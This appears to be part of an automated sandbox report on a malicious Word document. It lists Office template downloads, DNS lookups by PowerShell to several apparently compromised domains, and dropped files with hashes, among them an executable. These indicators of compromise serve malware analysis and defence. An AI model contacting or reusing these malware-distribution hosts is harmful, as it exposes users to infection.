    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    tls, http
    WINWORD.EXE
    1.6kB
    32.0kB
    18
    28

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    tls, http
    WINWORD.EXE
    1.8kB
    27.5kB
    21
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    tls, http
    WINWORD.EXE
    1.6kB
    27.2kB
    17
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    tls, http
    WINWORD.EXE
    1.6kB
    28.2kB
    18
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    tls, http
    WINWORD.EXE
    1.6kB
    29.7kB
    18
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    tls, http
    WINWORD.EXE
    1.5kB
    27.6kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    tls, http
    WINWORD.EXE
    2.0kB
    28.0kB
    23
    24

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    tls, http
    WINWORD.EXE
    1.6kB
    27.4kB
    17
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    tls, http
    WINWORD.EXE
    1.5kB
    24.9kB
    15
    23

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    tls, http
    WINWORD.EXE
    6.7kB
    310.2kB
    119
    228

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    tls, http
    WINWORD.EXE
    9.0kB
    291.8kB
    161
    213

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    tls, http
    WINWORD.EXE
    9.0kB
    287.7kB
    146
    211

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    tls, http
    WINWORD.EXE
    21.5kB
    573.5kB
    321
    418

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    tls, http
    WINWORD.EXE
    21.8kB
    666.1kB
    361
    484

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    tls, http
    WINWORD.EXE
    21.7kB
    726.9kB
    377
    526

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    tls, http
    WINWORD.EXE
    39.5kB
    1.1MB
    684
    824

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    tls, http
    WINWORD.EXE
    75.7kB
    2.2MB
    1177
    1558

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    tls, http
    WINWORD.EXE
    44.4kB
    1.4MB
    717
    982

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    tls, http
    WINWORD.EXE
    81.6kB
    2.6MB
    1377
    1881

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

    HTTP Response

    200
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    97.6kB
    2.8MB
    2037
    2031

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    WINWORD.EXE
    73 B
    244 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.28.47

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    47.28.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    47.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    46.28.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    46.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    14.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    givingthanksdaily.com
    dns
    powershell.exe
    67 B
    83 B
    1
    1

    DNS Request

    givingthanksdaily.com

    DNS Response

    66.96.134.60

  • 8.8.8.8:53
    tskgear.com
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    tskgear.com

    DNS Response

    103.197.57.20

  • 8.8.8.8:53
    6.173.189.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    6.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    60.134.96.66.in-addr.arpa
    dns
    71 B
    115 B
    1
    1

    DNS Request

    60.134.96.66.in-addr.arpa

  • 8.8.8.8:53
    20.57.197.103.in-addr.arpa
    dns
    72 B
    106 B
    1
    1

    DNS Request

    20.57.197.103.in-addr.arpa

  • 8.8.8.8:53
    26.35.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    26.35.223.20.in-addr.arpa

  • 8.8.8.8:53
    184.83.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    184.83.221.88.in-addr.arpa

  • 8.8.8.8:53
    226.21.18.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    226.21.18.104.in-addr.arpa

  • 8.8.8.8:53
    duolife-partner.com
    dns
    powershell.exe
    65 B
    138 B
    1
    1

    DNS Request

    duolife-partner.com

  • 8.8.8.8:53
    ponturibaschetcristianionut.com
    dns
    powershell.exe
    77 B
    150 B
    1
    1

    DNS Request

    ponturibaschetcristianionut.com

  • 8.8.8.8:53
    mrveggy.com
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    mrveggy.com

    DNS Response

    177.12.170.95

  • 8.8.8.8:53
    ifarmer.com.br
    dns
    powershell.exe
    60 B
    60 B
    1
    1

    DNS Request

    ifarmer.com.br

  • 8.8.8.8:53
    uniteddatabase.net
    dns
    powershell.exe
    64 B
    80 B
    1
    1

    DNS Request

    uniteddatabase.net

    DNS Response

    173.254.237.178

  • 8.8.8.8:53
    95.170.12.177.in-addr.arpa
    dns
    72 B
    114 B
    1
    1

    DNS Request

    95.170.12.177.in-addr.arpa

  • 8.8.8.8:53
    178.237.254.173.in-addr.arpa
    dns
    74 B
    113 B
    1
    1

    DNS Request

    178.237.254.173.in-addr.arpa

  • 8.8.8.8:53
    metadata.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    231 B
    1
    1

    DNS Request

    metadata.templates.cdn.office.net

    DNS Response

    23.62.61.162
    23.62.61.184

  • 8.8.8.8:53
    binaries.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    202 B
    1
    1

    DNS Request

    binaries.templates.cdn.office.net

    DNS Response

    2.17.251.23
    2.17.251.17

  • 8.8.8.8:53
    162.61.62.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    162.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    23.251.17.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    23.251.17.2.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    106.246.116.51.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    106.246.116.51.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vukzly54.wb1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\m4Obyxb\O2ee0Qk\W_c1yyz.exe

    Filesize

    60KB

    MD5

    6b8469cda5a5dd989f9b1b5d0748e0cb

    SHA1

    5d0e53f5ba85ef5288a1883e75528e3df3a3da60

    SHA256

    b3e2d2bb65ee223bda473aab760bafaacf3e6fab52f0c290690e5ff5632fd1d2

    SHA512

    bba57cc6d1ecb240404f75f97549de22aac482894f3d1ca203aaf2236d05af01f8c51c7d11a86d8f8b5251ce8a28c9d7ba47912c91e4f6b0d14b1644c836634a

  • memory/1692-10-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-62-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-7-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-9-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-8-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-5-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-3-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-0-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-13-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-14-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

    Filesize

    64KB

  • memory/1692-16-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-15-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-12-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-11-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-17-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

    Filesize

    64KB

  • memory/1692-29-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-33-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-60-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-6-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-61-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-4-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-617-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-2-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-108-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-109-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

    Filesize

    4KB

  • memory/1692-110-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-111-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-1-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

    Filesize

    4KB

  • memory/1692-589-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-590-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-591-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-592-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-614-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-615-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-613-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-616-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/2384-82-0x000001B9298E0000-0x000001B929902000-memory.dmp

    Filesize

    136KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.